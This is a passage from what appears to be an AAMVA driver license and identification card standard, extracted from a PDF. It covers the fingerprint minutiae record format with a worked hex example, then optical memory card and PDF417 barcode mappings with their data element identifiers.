+bifurcation” or split point. There are other types of “points of interest” in the friction ridges that occur much less
+frequently and are more difficult to define precisely. This standard defines a category of “other” minutia for points that
+are not clearly a ridge ending nor a bifurcation.
+C.10.3 Minutia Location
+C.10.3.1 Coordinate System
+The coordinate system used to express the minutia points of a fingerprint shall be a Cartesian coordinate system.
+Points shall be represented by their X and Y coordinates where X is increasing to the right and Y is increasing upward.
+Note that this is in agreement with typical mathematical graphing practice, but the direction of the Y-axis is the
+opposite of most imaging and image processing use. The X and Y coordinates of the minutia points shall be in pixel
+units, with the spatial resolution of a pixel given in the “X Resolution” and “Y Resolution” fields of the format. X and Y
+resolutions are stated separately.
+C.10.3.2 Minutia Placement on a Ridge Ending
+The minutia point for a ridge ending shall be defined as the point of forking of the medial skeleton of the valley area
+immediately in front of the ridge ending. If the valley area were thinned down to a single-pixel-wide skeleton, the point
+38
+
+where the three legs intersect is the location of the minutia. In simpler terms, the point where the valley “Y”’s, or
+(equivalently) where the three legs of the thinned valley area intersect.
+C.10.3.3 Minutia Placement on a Ridge Bifurcation
+In corresponding fashion, the minutia point for a ridge bifurcation shall be defined as the point of forking of the medial
+skeleton of the ridge. If the ridge were thinned down to a single-pixel-wide skeleton, the point where the three legs
+intersect is the location of the minutia. In simpler terms, the point where the ridge “Y”’s, or (equivalently) where the
+three legs of the thinned ridge intersect.
+C.10.3.4 Minutia Placement on Other Minutiae Types
+For minutiae other than a bifurcation or ridge ending the placement and angle of direction shall be vendor defined.
+C.10.4 Minutia Direction
+C.10.4.1 Angle Conventions
+Angles are expressed in standard mathematical format, with zero degrees to the right and angles increasing in the
+counterclockwise direction.
+C.10.4.2 Angle of a Ridge Ending
+The angle of a ridge ending is defined as the angle of a line segment originating at the minutia point location, and
+extending to the end of the medial skeleton of the ridge itself. In other words, the angle of a line from the minutia point
+to the point at the end of the thinned ridge.
+C.10.4.3 Angle of a Ridge Bifurcation
+The angle of a ridge bifurcation is defined as the angle of a line segment originating at the minutia point location, and
+extending to the end of the medial skeleton of the area between the two ridge branches. In other words, the angle of a
+line from the minutia point to the endpoint of the enclosed valley.
+39
+
+q
+Bifurcation
+Ridge Ending
+Figure C.2 - Minutia Location
+40
+
+C.11 Finger Minutiae Record Format
+The minutiae record format shall be used to achieve interoperability between finger matchers providing a one-to-one
+verification. The minutia data shall be represented in a common format, containing both public and private (proprietary)
+data. With the exception of the Format Identifier and the Version number for the standard, which are null-terminated
+ASCII character strings, all data is represented in binary format. There are no record separators or field tags; fields are
+parsed by byte count.
+All multibyte quantities are represented in Big-Endian format; that is, the more significant bytes of any multibyte
+quantity are stored at lower addresses in memory than (and are transmitted before) less significant bytes. All numeric
+values are fixed-length integer quantities, and are unsigned quantities.
+The organization of the record is as follows:
+· A fixed-length (26-byte) record header containing information about the overall record, including the number of
+fingers represented and the overall record length in bytes;
+· A Single Finger record for each finger, consisting of:
+· A fixed-length (4-byte) header containing information about the data for a single finger, including the number of
+minutiae;
+· A series of fixed-length(6-byte) minutia point descriptions, including the position, type, angle and quality of the
+minutia point;
+· One private data areas for each finger, containing vendor-specific information.
+C.11.1 Record Header
+There shall be one and only one record header for minutiae record to hold information describing the identity and
+characteristics of device that generated the minutiae data.
+C.11.1.1 Format Identifier
+The Finger Minutiae Record shall begin with the three ASCII characters “FMR” to identify the record as following this
+standard, followed by a zero byte as a NULL string terminator.
+C.11.1.2 Version Number
+The version number for the version of this standard used in constructing the minutiae record shall be placed in four
+bytes. This version number shall consist of three ASCII numerals followed by a zero byte as a NULL string terminator.
+The first and second character will represent the major revision number and the third character will represent the minor
+revision number.
+Upon approval of this specification, the version number shall be “ 10” (an ASCII space followed by an ASCII ‘1’ and an
+ASCII ‘0’).
+C.11.1.3 Length of Record
+The length of the entire record shall be recorded in two bytes.
+41
+
+C.11.1.4 System Vendor ID
+These two bytes shall uniquely identify the vendor or “owner” of the encoding equipment. This “owner code” shall use
+values defined and maintained by the International Biometric Industry Association (www.ibia.org). A value of zero will
+not be allowed.
+C.11.1.5 Feature Extraction Software ID
+The feature extraction version shall be recorded in two bytes. A value of all zeros will be acceptable and will indicate
+that the SW ID is unreported. The value of this field is determined by the vendor. Applications developers may obtain
+the values for these codes from the vendor.
+C.11.1.6 Scanner ID
+The scanner ID shall be recorded in two bytes. A value of all zeros will be acceptable and will indicate that the scanner
+ID is unreported. The value of this field is determined by the vendor. Applications developers may obtain the values for
+these codes from the vendor.
+C.11.1.7 Size of Scanned Image in X direction
+The size of the original image in pixels in the X direction shall be contained in two bytes.
+C.11.1.8 Size of Scanned Image in Y direction
+The size of the original image in pixels in the Y direction shall be contained in two bytes.
+C.11.1.9 Scan Rate in X direction
+The resolution of the finger scanner shall be recorded in two bytes having the units of pixels per centimeter. The value
+of the sensor X resolution shall not be zero.
+C.11.1.10 Scan Rate in Y direction
+The resolution of the finger scanner shall be recorded in two bytes having the units of pixels per centimeter. The value
+of the sensor Y resolution shall not be zero.
+C.11.1.11 Number Of Fingers
+The number of fingers contained in the minutiae record shall be recorded in one byte.
+C.11.1.12 Reserved Byte
+A single byte is reserved for future revision of this specification. For Version 1.0 of this standard, this byte must be set
+to 0.
+C.11.2 Single Finger Record Format
+C.11.2.1 Finger Header
+A finger header shall start each section of finger data providing information for that finger. There shall be one finger
+header for each finger contained in the finger minutiae record. The finger header will occupy a total of four bytes as
+described below. Note that it is permissible for more than one finger record to represent the same finger, with
+(presumably) different data, perhaps in the private area.
+42
+
+C.11.2.1.1 Finger Position
+The finger position shall be recorded in one byte. The codes for this byte shall be as defined in Table 5 of ANSI/NIST-
+CSL 1-1993, “Data Format for the Interchange of Fingerprint Information”. This table is reproduced here for
+convenience. Only codes 0 through 10 shall be used; the “plain” codes are not relevant for this standard.
+Table C.1 - Finger Position codes
+Finger position Code
+Unknown finger 0
+Right thumb 1
+Right index finger 2
+Right middle finger 3
+Right ring finger 4
+Right little finger 5
+Left thumb 6
+Left index finger 7
+Left middle finger 8
+Left ring finger 9
+Left little finger 10
+Plain right thumb 11
+Plain left thumb 12
+Plain right four fingers 13
+Plain left four fingers 14
+C.11.2.1.2 Impression Type
+The impression type of the finger images that the minutiae data was derived from shall be recorded in one byte. The
+codes for this byte shall be as defined in Table 4 of ANSI/NIST-CSL 1-1993, “Data Format for the Interchange of
+Fingerprint Information”. This table is reproduced here for convenience. Only codes 0 through 3 shall be used; the
+“latent” codes are not relevant for this standard.
+Table C.2 - Impression Type codes
+Description Code
+Live-scan plain 0
+Live-scan rolled 1
+Nonlive-scan plain 2
+Nonlive-scan rolled 3
+Latent impression 4
+Latent tracing 5
+Latent photo 6
+Latent lift 7
+43
+
+C.11.2.1.3 Finger Quality
+The quality of the overall finger minutiae data shall be between 0 and 100 and recorded in one byte. This quality
+number is an overall expression of the quality of the finger record, and represents quality of the original image, of the
+minutia extraction and any additional operations that may affect the minutia record. A value of 0 shall represent the
+lowest possible quality and the value 100 shall represent the higher possible quality. The numeric values in this field
+will be set in accordance with the general guidelines contained in Section 2.1.42 of the “BioAPI H-Level Specification
+Version 1.00”. This value may be used by the matcher to determine its certainty of verification.
+C.11.2.1.4 Number of Minutiae
+The number of minutiae recorded for the finger shall be recorded in one byte.
+C.11.2.2 Finger Minutiae Data
+The finger minutiae data for a single finger shall be recorded in blocks of six bytes per minutia point. The order of the
+minutiae is not specified.
+C.11.2.2.1 Minutiae Type
+The type of minutiae will be recorded in the first two bits of the upper byte of the X coordinate. There will be two bits
+reserved at the beginning of the upper byte of the Y coordinate for future use. The bits “00” will represent a minutia of
+“other” type, “01” will represent a ridge ending and “10” will represent a bifurcation.
+C.11.2.2.2 Minutiae Position
+The X coordinate of the minutia shall be recorded in the rest of the first two bytes (fourteen bits). The Y coordinate
+shall be placed in the lower fourteen bits of the following two bytes. The coordinates shall be expressed in pixels at the
+resolution indicated in the record header. Note that position information shall be present for each minutia point,
+regardless of type, although position for minutiae of type “other” is vendor defined.
+C.11.2.2.3 Minutiae Angle
+The angle of the minutia shall be recorded in one byte in units of 2 degrees. The value shall be a non-negative value
+between 0 and 179, inclusive. For example, an angle value of 5 represents 10 degrees. Note that angle information
+shall be present for each minutia point, regardless of type, although angle for minutiae of type “other” is vendor
+defined.
+C.11.2.2.4 Minutiae Quality
+The quality of each minutia shall be recorded in one byte. The quality figure shall range from 100 as a maximum to 1
+as a minimum. Any equipment that does not supply quality information for individual minutia points shall set all quality
+values to 0.
+C.11.3 Proprietary Data
+The optional section of the finger minutiae record is open to placing proprietary data required by the matcher to
+maintain its highest performance level. The size of this section should be kept as small as possible, augmenting the
+data stored in the standard minutiae section. The proprietary data for each finger shall immediately follow the standard
+minutiae data.
+C.11.3.1 Type Identification Code
+The type identification code shall be recorded in two bytes, and shall distinguish the format of the private area (as
+defined by the Vendor specified in field C.11.1.4). A value of zero shall indicate that there is no following proprietary
+data. This code shall be maintained by the vendor.
+44
+
+C.11.3.2 Length of Data
+The length of the proprietary data section, including the vendor identification and length of data fields, shall be
+recorded in two bytes. This value is used to skip to the next finger minutiae data if the matcher cannot decode and use
+this data. If the type identification (field C.11.3.1) for the private area is zero, indicating no private data, this field shall
+not be present.
+C.11.3.3 Private Data
+The data field of the proprietary data is specifically defined by the equipment that is generating the finger minutiae
+record. If the type identification (field C.11.3.1) for the private area is zero, indicating no private data, this field shall not
+be present.
+45
+
+Minutiae Record Format Summary
+The following table is a reference for the fields present in the Finger Minutia Record format. For more specific
+information, please refer to the text and to the Record Format Diagrams in the next section.
+Table C.3 - Minutia Record Format Summary
+Field Size Valid Values Notes
+Format Identifier 4 bytes ‘F’ ‘M’ ‘R’ 0x0 “FMR ” – finger minutiae record
+Version of this standard 4 bytes n n n 0x0 ” XX”
+Length of total record 2 bytes >= 26 In bytes
+Scan System
+Vendor / Format owner ID 2 bytes Registration authority controlled
+Feature Extraction SW Ver. 2 bytes Vendor specified
+Scanner ID 2 bytes Vendor specified
+Image Size in X 2 bytes in pixels
+Image Size in Y 2 bytes in pixels
+Sensor X Resolution 2 bytes in pixels per cm
+Sensor Y Resolution 2 bytes in pixels per cm
+Number of Fingers 1 byte
+Reserved 1 byte 0x00 Always 0x00 currently
+Finger Position 1 byte 0 to 11 Refer to ANSI/NIST standard
+Impression Type 1 byte 0 to 3 Refer to ANSI/NIST standard
+Finger Quality 1 byte 0 to 100 0 to 100
+Number of Minutiae 1 byte
+X 2 byte Expressed in image pixels
+(minutia type in upper 2 bits)
+Y 2 byte Expressed in image pixels
+(upper 2 bits reserved)
+q 1 byte 0 to 180 Resolution is 2 degrees
+Quality 1 byte 0 to 100 1 to 100 (0 indicates “quality not reported”)
+Type Code for Private Area 2 bytes 0x0000 = no private area
+Length of private feature area 2 bytes only present if Type Code non-zero
+Private feature area Specified in only present if Type Code non-zero
+previous
+field
+46
+drocer
+regnif
+aitunim
+regnif
+
+C.12 Record Format Diagrams
+C.12.1 Overall Record Format
+C.11.2 C.11.2
+C.11.3
+C.11.1 Finger Minutia Finger Minutia C.11.3
+Private Data
+Record Header Record Record Private Data
+see C.12.2 belowsee C.12.3 below see C.12.3 belowSeeC.12.5 below see C.12.5 below
+One header One finger minutia One private data area per
+per record – record per finger finger (Type ID = 0 if no
+private data)
+22 bytes
+C.12.2 Record Header
+C.11.1.1 C.11.1.2 C.11.1.3 C.11.1.4 C.11.1.5 C.11.1.6
+Format ID Spec Version Record Length Vendor ID SW ID Scanner ID
+’F’‘M’‘R’0 ’ ’‘X’‘X’0 length vendor ID software ID scanner ID
+4 bytes 4 bytes 2 bytes 2 bytes 2 bytes 2 bytes
+C.11.1.7 C.11.1.8 C.11.1.9 C.11.1.10 C.11.1.11 C.11.1.12
+X image size Y image size X scan rate Y scan rate # of fingers Reserved byte
+X image size Y image size X scan rate Y scan rate # of fingers 0x00
+2 bytes 2 bytes 2 bytes 2 bytes 1 byte 1 byte
+C.12.3 Single Finger Minutia Record
+C.11.2.1.1 C.11.2.1.2 C.11.2.1.3 C.11.2.1.4 C.11.2.2 C.11.2.2
+Finger Position Impression Type Finger Quality Number of Minutiae Finger Minutia data Finger Minutia data
+Finger number 0 -3 quality 0 - 100 # of minutiae See C.12.4 below See C.12.4 below
+1 byte 1 byte 1 byte 6 bytes 6 bytes 6 bytes
+47
+
+C.12.4 Finger Minutiae Data
+C.11.2.2.1 C.11.2.2.2 C.11.2.2.1 C.11.2.2.2 C.11.2.2.3 C.11.2.2.4
+Minutia Type X location Reserved Y location Minutia Angle Minutia Quality
+type xcoordinate reserved ycoordinate angle in 2 deg quality, 0-100
+2 bits 14 bits 2 bits 14 bits 1 byte 1 byte
+2 bytes 2 bytes
+C.12.5 Private (Proprietary) Data
+C.11.3.1 C.11.3.2 C.11.3.3
+Type ID Length Private Data Private Data
+Type ID code Length private
+2 bytes 22 bbyytteess (‘Length’ – 4)
+bytes
+48
+
+C.13 Interoperable Matcher Performance (Informative)
+The concept of operation for 1 to 1 verification matching is as follows. All compliant equipment will provide a minutia
+records consisting of at least the public areas defined above. Based on the data contained in these fields, and the
+common definitions of minutia points and their locations and angles, all compliant vendors will be able to achieve some
+reasonably high level of performance in verifying a live sample against the public record. This is represented by
+“Algorithm B” matching in the diagram below. Note that “Algorithm A” produces the record, and “Algorithm B” reads
+only the public area.
+However, the optimum in performance (defined as minimal False Accept Rate and False Reject Rate) may be
+achieved by using proprietary methods and features. To allow vendors to support this enhanced level of performance,
+the proprietary or “private” data area allows additional data to be present. If the reading and matching equipment can
+interpret and make use of this additional data (either because the same vendor supplies it, or because of cross-
+licensing of technology or other collaboration), then higher levels of performance may be achieved. This situation is
+represented by “Algorithm A” matching below.
+Finger Algorithm A
+Standard Standard Algorithm A
+Image Template
+Header Minutiae Proprietary
+Collection Generation
+Finger Image Algorithm A
+Verification
+Collection Matching
+Results
+Finger Image Algorithm B
+Verification
+Collection Matching
+Results
+Figure C.3 - Interoperability Concept
+49
+
+C.14 Compliance (Informative)
+Interoperability of one-to-one matching relies on each matcher to adhere within a tolerance to the determination of the
+minutiae. Compliance with this specification is important in two areas: format compliance and minutiae extraction
+accuracy.
+Testing for compliance is not described in this standard; refer to applicable Best Practices documents for further
+description.
+C.14.1 Record format compliance
+Equipment and algorithms that are compliant with this standard must observe the format and syntax described herein.
+This includes: order and size of fields, presence of all required fields, adherence to range limits on values, and internal
+consistency (the number of single finger records must match the number of fingers, for example).
+C.14.2 Finger Minutiae Extraction
+Finger images of sufficiently good quality should generate minutiae records that are “sufficiently similar” for all
+compliant equipment and algorithms. This is essential to the underlying goal of interoperability. Testing for this
+requirement may consist of encoding and formatting of data from a test set of sample images, with a known set of
+minutiae features. The equipment under test may be evaluated based on the number of minutiae points that differ from
+the known standard by a significant degree, and on the number of minutiae points detected by one system and not the
+other. Standards for these metrics (degree of difference, allowable numbers of differences) are dependent on the
+specific application.
+50
+
+C.15 Example MInutiae Record (Informative)
+This example minutiae record demonstrates the format for a given set of data.
+C.15.1 Data
+Scan System: Vendor ID = 0x42, Feature Extraction SW Version code 0x11, Scanner ID = 0x00B5
+(these values are determined by the IBIA (for the Vendor ID) and by the vendor)
+Sensor Resolution: 500 dpi in both X and Y axes; 196.85 pixels per cm, Image was 512 by 512 pixels
+Plain live-scan prints of the left and right index fingers
+Left Index: Finger quality is 90% of the maximum possible
+27 minutia, listed in table below.
+No private feature data
+Right Index: Finger quality is 70% of the maximum possible
+22 minutia, listed in table below.
+Private feature data area (Type 01) consisting of six bytes: 0x01, 0x44, 0xBC, 0x36, 0x21, 0x43
+Record length = 340 = 26 (record header) + 2 * 4 (finger headers) + 27 * 6 (minutia for 1st finger) +
+22 * 6 (minutia for 2nd finger) + 2 (null private area for 1st finger) + 10 (private area for 2nd finger)
+Minutia Left Index Finger Right Index Finger
+# Type X Y Angle quality Type X Y Angle quality
+0 Ending 100 14 112 90 ending 40 93 0 90
+1 Ending 164 17 85 80 bifurcation 116 100 0 80
+2 Bifurcation 55 18 22 90 ending 82 95 12 70
+3 Bifurcation 74 22 76 60 bifurcation 140 113 15 70
+4 Ending 112 22 90 80 ending 122 135 18 80
+5 Bifurcation 42 31 44 90 bifurcation 55 72 21 50
+6 Bifurcation 147 35 51 90 ending 94 74 24 60
+7 Ending 88 38 165 40 ending 155 62 42 80
+8 Bifurcation 43 42 4 80 bifurcation 42 64 55 70
+9 Ending 56 48 33 70 ending 155 85 59 80
+10 Ending 132 49 72 90 bifurcation 96 192 62 80
+11 Bifurcation 71 50 66 80 ending 114 86 85 80
+12 Other 95 51 81 90 bifurcation 142 90 90 70
+13 Ending 112 53 132 50 ending 57 137 90 90
+14 Bifurcation 135 58 32 80 ending 131 75 90 80
+15 Other 41 60 59 70 ending 45 113 98 80
+16 Bifurcation 67 62 145 90 bifurcation 111 171 114 50
+17 Ending 91 63 132 80 ending 95 62 156 60
+18 Ending 112 65 33 60 bifurcation 61 114 165 80
+19 Ending 53 71 45 90 bifurcation 143 72 171 80
+20 Bifurcation 104 74 12 80 ending 63 104 172 70
+21 Ending 75 79 21 90 bifurcation 125 73 173 40
+22 Bifurcation 48 80 92 90
+23 Ending 130 89 45 80
+24 Bifurcation 63 95 126 80
+25 Ending 47 108 164 90
+26 Bifurcation 126 115 172 30
+51
+
+C.15.2 Example Data Format Diagrams
+C.11.1.1 C.11.1.2 C.11.1.3 C.11.1.4 C.11.1.5 C.11.1.6
+Format ID Spec Version Record Length Vendor ID SW ID Scanner ID
+’F’‘M’‘R’0 ’0’‘1’‘0’0 0x0154 0x0042 0x0011 0x00B5
+C.11.1.7 C.11.1.8 C.11.1.9 C.11.1.10 C.11.1.11 C.11.1.12
+X image size Y image size X scan rate Y scan rate # of fingers Reserved byte
+0x0200 0x0200 0x00C5 0x00C5 0x02 0x00
+512 decimal 512 decimal 197 decimal 197 decimal # of fingers reserved
+C.11.2.1.1 C.11.2.1.2 C.11.2.1.3 C.11.2.1.4
+Finger Position Impression Type Finger Quality Number of Minutiae
+0x07 0x00 0x5A 0x1B
+left index plain live-scan 90 decimal 27 minutiae
+C.11.2.2.
+C.11.2.2. C.11.2.2.3 C.11.2.2.4
+X2 Location
+Y2 Location Minutia Angle Minutia Quality
+and Type
+0x4064 0x000E 0x70 0x5A
+0x4000 (type) 14 decimal 112 90 decimal
+& 100 decimal decimal
+C.11.2.1.1 C.11.2.1.2 C.11.2.1.2 C.11.2.1.3
+Finger Position Impression Type Finger Quality Number of Minutiae
+0x02 0x00 0x46 0x16
+right index plain live-scan 70 decimal 22 minutiae
+C.11.2.2.
+C.11.2.2. C.11.2.2.3 C.11.2.2.4
+X2 Location
+Y2 Location Minutia Angle Minutia Quality
+and Type
+0x4028 0x005D 0x00 0x5A
+0x4000 (type) 93 decimal 0 decimal 90 decimal
+& 93 decimal
+C.11.3.1 C.11.3.1 C.11.3.2 C.11.3.3
+Private Area Type IDPrivate Area Type ID Private Data Length Private data
+0x0000 0x0001 0x000A 0x0144BC362143
+52
+
+C.15.3 Raw Data for the Resulting Minutiae Record
+Record Header:
+0x464D52003031300001540042001100B50200020000C500C50200
+1st Finger Header:
+0x07005A1B
+1st Finger Minutiae data:
+0x4064000E705A 0x40A400115550 0x80370012165A
+0x804A00164C3C 0x407000165A50 0x802A001F2C5A
+0x80930023335A 0x40580026A528 0x802B002A0450
+0x403800302146 0x40840031485A 0x804700324250
+0x005F0033515A 0x407000358432 0x8087003A2050
+0x0029003C3B46 0x8043003E915A 0x405B003F8450
+0x40700041213C 0x403500472D5A 0x8068004A0C50
+0x404B004F155A 0x803000505C5A 0x408200592D50
+0x803F005F7E50 0x402F006CA45A 0x807E0073AC1E
+2nd Finger Header:
+0x02004616
+2nd Finger Minutiae data:
+0x4028005D005A 0x807400640050 0x4052005F0C46
+0x808C00710F46 0x407A00871250 0x803700481532
+0x405E004A183C 0x409B003E2A50 0x802A00403746
+0x409B00553B50 0x806000C03E50 0x407200565550
+0x808E005A5A46 0x403900895A5A 0x4083004B5A50
+0x402D00716250 0x806F00AB7232 0x405F003E9C3C
+0x803D0072A550 0x808F0048AB50 0x403F0068AC46
+0x807D0049AD28
+1st Private Data Area:
+0x0000
+2nd Private Data Area:
+0x0001000A0144BC362143
+53
+
+54
+
+Annex D
+(normative)
+Mapping of driver license/identification card information to optical memory
+cards
+Introduction
+This annex defines mapping of the driver license/identification card machine-readable data elements, as defined in
+clause 6, onto an optical memory card.
+D.1 Conformance
+A driver license/identification card that incorporates optical memory shall comply with the following standards; ISO/IEC
+11693 and 11694 Parts 1 - 4.
+D.2 File location
+The Information content of the magnetic stripe, defined in annex A of this standard shall be written to both the first and
+last user data tracks of the optical memory card. The data shall be written as ASCII exactly duplicating the data format
+and structure defined in A.4. Unused sectors in the first and last user data tracks shall be reserved for future use.
+D.3 Updating of data
+The data written to the first and last user data tracks shall be read-only. If updating of the data is permitted, additional
+sectors in the first and last user data tracks may be used to control access for updating purposes and to specify the
+location of the updated data. The original data in the first and last user data tracks shall remain unchanged in order to
+provide an audit trail.
+55
+
+56
+
+Annex E
+(normative)
+Mapping of driver license/identification card information to 2 dimensional bar
+codes
+Introduction
+This annex defines mapping of the driver license/identification card machine-readable information elements, as defined
+in clause 6, onto a 2 Dimensional bar code.
+E.1 Conformance
+A prerequisite for conformance with this standard for bar coding is conformance with ANSI X3.182, ANSI/ASQC Z1.4,
+ASCII/ISO 646, ASCII/ISO 8859-1, ISO/IEC 15438, and MIL-L-61002.
+E.2 Symbology
+The PDF417 symbology (see ISO/IEC 15438 Automatic Identification and Data Capture Techniques - International
+Two-dimensional Symbology Specification - PDF417) shall be used for the Drivers License application.
+For the Drivers License Application, the following PDF417 symbology variants as defined in the ISO/IEC 15438
+Automatic Identification and Data Capture Techniques - International Two-dimensional Symbology Specification -
+PDF417 shall NOT be used.
+¾ Compact PDF417
+¾ MicroPDF417
+¾ MacroPDF417
+E.3 Card Characteristics
+E.3.1 Symbology Characteristics
+The symbology characteristics shall conform to ISO/IEC 15438.
+E.3.2 Dimensions and Print Quality
+E.3.2.1 Narrow element dimension
+The narrow element dimension (X dimension) range shall be from .170mm (.0066 inch) to .380mm (.015 inch) as
+determined by the printing capability of the supplier/printer. Symbols with narrow elements at the lower end of this
+range, i.e., .170mm (.0066 inch) to .250mm (.010 inch), may require special care to meet the print quality
+requirements of this standard.
+57
+
+E.3.2.2 Row height
+The PDF417 symbol shall have a minimum row height (height of the symbol element) of three (3) times the width of
+the narrow element (“X” dimension). Increasing the row height may improve scanning performance but will reduce the
+number of characters that can be encoded in a given space.
+E.3.2.3 Quiet zone
+The PDF417 symbol shall have a minimum quiet zone of 1X (X = the narrow element dimension) above, below, to the
+left, and to the right. The quiet zone is included within the calculation of the size of the symbol.
+E.3.2.4 Print Quality
+The AIMUSA Uniform Symbology Specification PDF417 and ANSI X3.182 Bar Code Print Quality - Guideline shall be
+used to determine the print quality of the PDF417 symbol.
+For the drivers license application the minimum symbol grade shall be 3.5/10/660, where:
+Recommended Print Quality grade 3.5 (A) at the point of printing the symbol before lamination and a Print Quality
+Grade of 2.5 (B) after lamination.
+Measurement Aperture = .250mm (0.010 inch)
+Light Source Wavelength = 660 nanometers (nm) ± 10 nm
+The above symbol quality and measurement parameters assure scanability over a broad range of scanning
+environments.
+It is important that the bar code be decodable throughout the system of use. For this reason, quality tests shall not be
+limited to production inspection but also shall be followed through to the end use.
+E.3.2.5 Sampling
+To ensure that printed on-demand bar code symbols meet the above Print Quality specification, it is recommended
+that a sample set of symbols, produced in their final form, be verified a minimum of once per day.
+Military Standard, Sampling Procedures and Tables for Inspection by Attributes (ANSI/ASQC Z1.4), provides useful
+guidelines for statistically valid sampling plans. Acceptable quality levels (AQL) may be established prior to quality
+control inspection.
+E.3.2.6 Symbol Durability
+If Bar Code Symbol durability is required then the test method in Annex G, G.5, should be used.
+E.3.3 Bar code area
+The bar code area shall be located on the back side of the drivers license card. The maximum width of the PDF417
+symbol shall be 75.565 mm (2.975”). The maximum height of the PDF417 symbol shall be 38.1 mm (1.50”).
+E.3.4 Orientation and Placement
+E.3.4.1 PDF417 Orientation
+All PDF417 symbols and linear bar codes shall have the same orientation. The bars of the PDF417 symbol shall be
+perpendicular to the natural bottom of the card. (see Figure E-1).
+58
+
+The symbol skew shall not be more than ±5 degrees.
+E.3.4.2 Designing the Card Layout
+Figure E.1 — Orientation of PDF417 symbol on bottom
+Plan for the maximum amount of data:
+Determine the mandatory and optional fields that will be required in the message, and the maximum anticipated length
+of each field. Add in the additional characters needed for formatting.
+Plan for the maximum “X” dimension(s) that may be used:
+Since the supplier/printer of the card ultimately determines the “X” dimension at which the symbol will be printed, it is
+possible that a PDF417 symbol could be printed at any “X” dimension from .0066 inch to .015 inch. The largest “X”
+dimension that allows all the data to fit in the maximum area available shall be used when printing the symbol.
+E.4 Information contents and formats
+E.4.1 Data Structure
+All compliant 2D symbols shall employ a HEADER which shall allow interested parties to interpret the encoded data.
+SUBFILES shall be employed to carry the specific information. The combination of a HEADER and one or more
+SUBFILE DESIGNATORS shall make up a compliant 2D symbol.
+Each 2-Dimensional bar code shall begin with a file header that will identify the bar code as complying with the
+standard. The header shall be followed by a Subfile Designator “DL” to identify the Drivers License data type stored in
+the file. Each data element contained in a Subfile shall be prefaced by a Field Identifier as defined in E.4.4.1 and
+E.4.4.2. The use of a field separator character shall serve to both terminate a field and indicate the presence of a
+following field identifier.
+E.4.2 Header
+Compliant 2D Symbol’s must begin with a Header in the following format:
+Table E.1 — 2D symbols header format
+Field Bytes Contents
+1 1 Compliance Indicator: A 2D symbol encoded according to the rules
+of this standard shall include a Compliance Indicator. The Compliance
+Indicator as defined by this standard is the Commercial At Sign (“@”)
+(ASCII/ISO 646 Decimal “64”) (ASCII/ISO 646 Hex “40”). The
+Compliance Indicator is the first character of the symbol.
+59
+
+Field Bytes Contents
+2 1 Data Element Separator: The Data Element Separator is used in this
+standard to indicate that a new data element is to follow, and that the
+current field is terminated. Whenever a Data Element Separator is
+encountered (within a Subfile type which uses Data Element
+Separators), the next character(s) shall either be a Segment
+Terminator or shall define the contents of the next field according to
+the template of the specific Subfile. The Data Element Separator as
+defined by this standard is the Line Feed character (“L ” ASCII/ISO 646
+F
+Decimal “10”) (ASCII/ISO 646 Hex “0A”). The Data Element Separator
+is the second character of the symbol.
+3 1 Record Separator: The Record Separator as defined by this
+standard is the Record Separator character (“R ” ASCII/ISO 646
+S
+Decimal “30”) (ASCII/ISO 646 Hex “1E”). As this report is presented
+for ratification, there is no special case defined for when this field will
+be used. It is embodied within the recommendation for future growth.
+The Record Separator is the third character of the symbol and shall
+always be reflected within the header in a compliant symbol.
+4 1 Segment Terminator: As used in this standard the Segment
+Terminator is used to end Subfiles where Field Identifiers are
+employed. The Segment Terminator as defined by this standard is the
+Carriage Return character (“C ” ASCII/ISO 646 Decimal “13”)
+R
+(ASCII/ISO 646 Hex “0D”). The Segment Terminator is the fourth
+character of the symbol.
+5 5 File Type: This is the designator that identifies the file as an AAMVA
+compliant format. The designator is defined as the 5 byte upper
+character string “ANSI “, with a blank space after the fourth character
+.
+6 6 Issuer Identification Number (IIN): This number uniquely identifies
+the issuing jurisdiction and can be obtained by contacting the ISO
+Issuing Authority (AAMVA).
+7 2 Version Number: This is a decimal value between “0 and 63”, that
+specifies the version level of the Hi-Density bar code format. Version
+“0” is reserved for bar codes printed to the specification of the
+American Association of Motor Vehicle Administrators (AAMVA) prior
+to the adoption of this AAMVA National Standard. All bar codes
+compliant with this standard shall be designated Version “1” and are
+likely to remain Version “1”, but should a need arise requiring major
+revision to the format, this field provides the means to accommodate
+revision.
+8 2 Number of Entries: This is a decimal value between “01 and 99” that
+specifies the number of different Subfile types that are contained in the
+bar code. This value defines the number of individual SUBFILE
+DESIGNATORS which follow. All subfile designators (as defined
+below) follow one behind the other. The data related to the first Subfile
+Designator follows the last Subfile Designator.
+60
+
+E.4.3 Subfile Designator
+All compliant 2D bar code symbols must contain the “DL” subfile structure as defined below immediately after the
+Header as defined in E.4.2.
+Field Bytes Contents
+1 2 Subfile Type: This is the designator that identifies what type of
+data is contained in this portion of the file. The 2 character
+uppercase character field “DL” is the designator for Drivers License
+Subfile type containing Required and Optional data elements as
+defined in Sections 6.2, E.4.4.1 and E.4.4.2. Any jurisdiction has
+the right to define a Subfile Type to contain jurisdiction specific
+information provided that the Subfile type is a 2 character
+uppercase character field whose first character is “Z”.
+2 4 Offset: These bytes contain a 4 digit numeric value that specifies
+the number of bytes from the head or beginning of the file to where
+the data related to the particular sub-file is located. The first byte in
+the file is located at offset 0.
+3 4 Length: These bytes contain a 4 digit numeric value that specifies
+the length of the Subfile in bytes.
+E.4.4 Elements
+Tables E.4.4.1 and E.4.4.2 define required and optional data elements which may be included in the “DL” subfile type.
+Jurisdiction specific data elements may also be encoded provided that the Bar Code ID is a 3 character uppercase
+character field beginning with “Z” Jurisdiction specific data elements shall be stored in a “Z” subfile type.
+E.4.4.1 Required
+Data Element Ref. # Bar Code ID
+Driver License Name 1 DAA
+Driver Mailing Street Address 1 2 DAG
+Driver Mailing City 3 DAI
+Driver Mailing Jurisdiction Code 4 DAJ
+Driver Mailing Postal Code 5 DAK
+Driver License/ID Number 6 DAQ
+Driver License Classification Code 8 DAR
+Driver License Restriction Code 9 DAS
+Driver License Endorsements Code 10 DAT
+Driver License Expiration Date 11 DBA
+Date of Birth 12 DBB
+Driver Sex 13 DBC
+Driver License or ID Document Issue 14 DBD
+Date
+E.4.4.2 Optional
+Data Element Ref. # Bar Code ID
+Height (FT/IN) 20 DAU
+Weight (LBS) 21 DAW
+61
+
+Data Element Ref. # Bar Code ID
+Eye Color 22 DAY
+Hair Color 23 DAZ
+Social Security Number 24 DBK
+Driver Permit Classification Code 25 PAA
+Driver Permit Expiration Date 26 PAB
+Permit Identifier 27 PAC
+Driver Permit Issue Date 28 PAD
